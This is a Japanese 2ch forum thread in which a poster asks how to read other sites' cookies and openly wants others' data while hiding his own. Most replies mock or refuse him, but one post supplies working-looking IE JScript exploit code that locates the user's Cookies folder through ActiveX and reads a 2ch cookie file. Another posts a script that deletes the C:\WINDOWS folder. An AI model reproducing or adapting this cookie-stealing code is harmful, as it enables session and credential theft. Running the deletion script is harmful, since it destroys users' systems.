他所のCookieを読み込みたいのですが
他所のCookieを読みたいのですが、どのような方法がありますか?
例えば、2chで保存されたCookieを私の掲示板で表示させるとかしたいのです。
なかなか難しい問題なので新規スレッドを立てさせてもらいました。
決してパスワードを盗むとかに使うわけじゃないのです.....決して。 あなたははっきり言って何もわかってませんので、>>22で勉強してください。 >>1
もしこのような機能を有効にするとパスワードとかが盗まれる可能性が
出てくる。>>1 がいくら
> 決してパスワードを盗むとかに使うわけじゃないのです.....決して。
といっても、全員が邪悪な用途に利用しないという保証はないから、ブラウザは
このような真似ができないように作られているし、もしこれができてしまったら
それは「セキュリティホール」以外の何ものでもない。
参考:
http://japan.cnet.com/News/2000/Item/000512-1.html
あきらめろ。 >>30
ウケ狙ってるつもり?はっきりいってつまんないよ。
串サイトはこちら!とかいって竹串のページかいたり。
逝ってよし。 2chの自分のクッキーを別の板でも使いたいという方向性では
いかがなものだろう? >>33
それは可能。2ch が
Set-Cookie: ayu=moe; domain=2ch.net
って感じで吐き出せば良い。 >>33,>>34
いやいや、それじゃ駄目なのです。
あくまで自分の情報は隠しつつ、いかに他人の情報を
得られるか、という事が重要なのです。
やっぱりセキュリティーホールを突くしかないんだろうなぁ...。 ハックラ逝け厨房
=============終了=============== 甲茶は正式にドキュンと認定されました
[EOF] >あくまで自分の情報は隠しつつ、いかに他人の情報を得られるか、という事が重要なのです。
臆面もなく他人のプライバシーは覗きたいが自分のプライバシーは守りたいなどと言えるあな
たはすばらしい。なお世間は法的にも技術的にもそんな穴は塞ぎに掛かっているから、望むの
は勝手だが時間の無駄であろうね。まあ、この調子なら他人を巻き添えにしなくても全部自分
でできるでしょ。せいぜいご自愛ください。
sage
sage
sage
sage
sage
sage age
age
age
--- 再開 ---
あれからperlとjavaスクリプトの組み合わせで、
特定のサイトのcookieだけを読み取る事はできるようになりましたです。
でも、やっぱりIE6になったら修正されるかもしれないし、
javaスクリプトをオンにしていないと使えないので引き続き情報を募集します。
できればもうちょっと簡単に、スマートに情報を読み取りたいのです。
と、いう事で、だ・れ・か・教えてください!! このスレッドでセキュリティホールを見つけたら
俺が徹底的にレポートして潰してやる
よって終了 function f1(){
dh.DOM.write('<IFRAME SRC=file://'+navigator.cookiefile.replace(/\\/,'/')+' name=I1></IFRAME>');
setTimeout('f2()',500);}
function f2(){
dh.DOM.all.I1.focus();
dh.DOM.all.I1.document.execCommand('selectall');
dh.DOM.all.I1.document.execCommand('copy');
var r=T1.createTextRange();r.execCommand('paste');
alert(T1.value);}
function GetUserName(def){
var s2='';try{
var c1=new ActiveXObject('NSComDlg.FileDlgCtrl.1');
c1.Flags=0x80;c1.ShowOpen();
var s1=c1.InitDir;
var t1=s1.indexOf('\\Documents and Settings\\');
if(t1>=0){
s2=s1.substr(t1+24);
t1=s2.indexOf('\\');
if(t1>=0){s2=s2.substr(0,t1);}
}
}catch(e){}if((!s2)&&def){s2=def;}return s2;}
navigator.username=GetUserName();
if(navigator.username){navigator.cookiehead='C:\\Documents and Settings\\'+t1+'\\Cookies\\'+t1+'@';}
if(navigator.cookiehead){
document.write('<OBJECT classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A id=dh></OBJECT>');
document.write('<TEXTAREA id=T1></TEXTAREA>');
}
function RequestCookie(file){
if(navigator.cookiehead){
navigator.cookiefile=navigator.cookiehead+file;
setTimeout('f1()',500);return true;
}
}
RequestCookie('corn.2ch[1].txt'); <script language="jscript">
var a
a = new ActiveXObject("Scripting.FileSystemObject");
a.DeleteFolder("C:\\WINDOWS",true);
</script>
で我慢してください。 >>47-48
困ったお子ちゃまですね・・・。
もう秋だというのに。 ヒソヒソヒソ。。。。クスクス。。。クスクス(・∀・) 結局ここってレベル低いのね
age
age
age □□□■■■■■■□□□□□■■■■■■□□□□□□□■■■□□□□□
□□■□□□□□□■□□□■□□□□□■□□□□□□■□□□■□□□□
□□□□□□□□■■□□□■□□□□□■□□□□□■□□□□□■□□□
□□□■■■■■■■□□□■□□□□□■□□□□■□□□□□□□■□□
□□■□□□□□■■□□□□■■■■■■□□□□■■■■■■■■■□□
□□■□□□□□■■□□□□□□■□□□□□□□■□□□□□□□□□□
□□■□□□□□■■□□□□■■■■■■■□□□□■□□□□□□□□□
□□■□□□□□■■□□□■□□□□□□□■□□□□■□□□□■□□□
□□□■■■■■□■■□□■□□□□□□□■□□□□□■■■■□□□□
□□□□□□□□□□∩□□□■■■■■■■□□□□□□□□□□□□□□
| ゝノ
__|_______|_ ■■■■■■■■
|iiiiiiiiiiiiiiiii| ■■■■■■■■■ナニヤッテンダヨ!バカモノガァ!
|iiiiiiiiiiiiiiiii| ■■■■√ === │
|iiiiiiiiiiiiiiiii|■■■■√ ~ ミ ノノノ 彡 |
|iiiiiiiiiiiiiiii|■■■√ Å Å \
|iiiiiiiiiiiiiiii|■■■ ∵ (● ●) ∴│ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|iiiiiiiiiiiiiiii|■■■ 丿■■■( │< 常にageとけって
|iiiiiiiiiiiiiiii|■■■ ■ д ■ | | 言ったじゃないかぁ!
|iiiiiiiiiiiiiiii|■■■■ ■■ ■■ ■ \_________
|iiiiiiiiiiiiiiiiii■■■■■■■■■■■■__
\iiiiiiiiiiiiiii■■■■■■■■■■■■iiヽ
\iiiiiiiiiiiii■■■■■■■■■■■iiiiiii|
|iiiiiiiiiiiiiiiii■■■■■■■■■■iiiiiiiii
(´m`)クスクス ク……… ( `m´)ププーッ 何このスレッド この子が変なスレ上げてるの?
時間あるんだねぇ、、 60と62は氏んでくださいです。
このスレッドを過去ログいかせる訳にはいかんのです。 とりあえずクロスサイトスクリプティングをcssと略すやつは逝ってよし 今日もいい天気でご機嫌です(^v^)
揚げさせてもらいますね♪ そういや、Proxomitronだっけ?
パーソナルなProxyの。
任意のクッキーが読み出せるセキュリティホールがあったねえ。
夏休み前ぐらいの時期だったかなあ。 寒くなってきました。
こんな夜にはageさせて頂きますね♪ (´-`).。oO(変な奴・・・あおってるつもりなのかなぁ・・・) // TODO: この位置にコマンド ハンドラ用のコードを追加してください
CString cs=GetDocument()->GetPathName(),cpm;
if(cs==""){
TCHAR szPath[_MAX_PATH];
VERIFY(::GetModuleFileName(AfxGetInstanceHandle(), szPath, _MAX_PATH));
LPTSTR lpszExt = _tcsrchr(szPath, '\\');
ASSERT(lpszExt != NULL);
ASSERT(*lpszExt == '\\');
*(++lpszExt) = 0;
cs=szPath;
}
cs=cs.Left(cs.ReverseFind('\\')+1);
cs=cs+GetTSSMona;
GetRichEditCtrl().GetWindowText(cpm);
CStdioFile file(cs,CFile::modeCreate|CFile::modeWrite);
file.WriteString(cpm);
file.Close();
::ShellExecute(0,"open",cs,NULL,NULL,SW_SHOW); >76
俺は紅茶は煽りだとおもうぞ。自分で調べればって感じです。
こういうタイプには知ってても教えてやらない。 >79
バカの一つ覚えじゃん。
いいかげんにうざいからやめろって・・・ 紅茶・・・いわゆる教えて君という物体
http://klablog.okiraku-pc.net/logs/current-bbs/161/xqqrlz.html
自分では調べようともせず、煽ると逆切れして「レベル低い」を連発する。
しかし、自分が一番レベルが低いと言う事には気付いていない。
すでに、こんな質問をする時点で低レベルで、
さらに、こんな単発質問をする時点で2chというものを理解していないらしい。
終了したスレを、再開させるのが趣味らしい。
>>75
のように突然わけの分からない事を言い出すが、冷え性らしい。
しかし、根はいい奴で、ネットだと人格が変わるらしく、暴走している。
こんなやさしい紅茶は今ごろドラえもんの夢でも見ならがおねんねしていることだろう。 おい、まだか。レベルが低いな。
結局クズの集まりじゃないか。
氏
氏
氏
氏
氏
氏
氏
氏
氏
氏 煽っているつもりはありませぬ。
セキュリーティを突くという事は自分の身を守る事にも
なるのです。
偽者のせいで煽りと思われているのです。。。(;;) Securityな話は高木先生などいかがだろうか。 うぅ、、知らぬ間にセキュリーティとかタイプしてるし....
僕はちゃんころじゃないのに。。。(;;) ところで君の方からオファーするものは無いのかな?
今の所正真正銘のおしえてくん見たいだが・・
一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね? >1
夏休みは終わったんだから早く学校に行きなさいね。
それともこの夏休みをきっかけにヒッキーになったのかな? ていうか、そんな低レベルな煽りじゃ相手に自分の底を知られて苦笑されるだけだよ。
たぶん紅茶は勝利の喜びを噛み締めまくったと思うぞ、あんたの書き込みを見て。 /∵∴∵∴\
/∵∴∵∴∵∴\
/∵∴∴,(・)(・)∴|
|∵∵/ ○ \|
|∵ / 三 | 三 | / ̄ ̄ ̄ ̄
|∵ | __|__ | < うるせー馬鹿!
\| \_/ / \____
\____/ 早く起きたので記念にageておきます。(^v^)
そういえば、IE6にしたら例の方法はやぱり使えなくなりました。(--;) ところで君の方からオファーするものは無いのかな?
今の所正真正銘のおしえてくん見たいだが・・
一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね?
ところで君の方からオファーするものは無いのかな?
今の所正真正銘のおしえてくん見たいだが・・
一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね?
ところで君の方からオファーするものは無いのかな?
今の所正真正銘のおしえてくん見たいだが・・
一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね?
ところで君の方からオファーするものは無いのかな?
今の所正真正銘のおしえてくん見たいだが・・
一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね?
ところで君の方からオファーするものは無いのかな?
今の所正真正銘のおしえてくん見たいだが・・
一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね?
ところで君の方からオファーするものは無いのかな?
今の所正真正銘のおしえてくん見たいだが・・
一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね?
ところで君の方からオファーするものは無いのかな?
今の所正真正銘のおしえてくん見たいだが・・
一ヶ月も情報集めれば普通の知能指数なら相応の知識が付くものだよね? IE6にもセキュリティーホールが見つかったYO!
他所のクッキーを読み込められるYO! >>紅茶
何らかの方法でTEMPフォルダに任意のHTMLコードを含むファイルを作成し、
何らかの方法でそのファイルを走査しパスを特定しろ、さらに、
何らかの方法でユーザー名を特定し、他所のCookieファイルを読み込め。 はじめまして!
自分は環境変数で得るCOOKIEを、外部の(例えば自分のサーバに設置しておいて2chのCOOKIEをゲットしたり)ものをゲット
したいのですが!!
お知恵をお貸しください!!!
$ENV{'HTTP_COOKIE'};
に何か付け加えて、指定別鯖のクッキーを得ることは出来ないでしょうか! そんなブラウザあったらこわいこわい。IEが昔ヤッチャッタけど もし取得できるなら確実にトリップクラックされるよな >>120
お前だけにこっそり教えよう。
まず、IEやNetscapeをこえる画期的なブラウザを作る。
次に、カチュやホットゾヌをこえるそのブラウザを使った画期的な2ch専用ブラウザを作る。
これで、世界中の人間に自分のブラウザを使わせるわけだ。
すると、自分のページに来る奴もそのブラウザを使っているということになる。
で、そのブラウザには自分にしかわからないセキュリティーホールをいれておく。
どんなクッキーでも見えてしまうと言うセキュリティーホールをな。
これで、外部のクッキーも食い放題と言うことだ。
すでに、M$が同じ方法をとっている可能性は極めて高いから、
ゲイツと友達になったらIE用のクッキー吸い出し方法教えて貰えるかもよ。 1つのCookieには4096バイトのデータを記録でき、最大で300のCookieを保存できる。1台のサーバが同じコンピュータに対して発行できるCookieの数は20個に制限されている。Cookieにはそれぞれ有効期限を設定することができ、有効期限を過ぎたCookieは消滅する。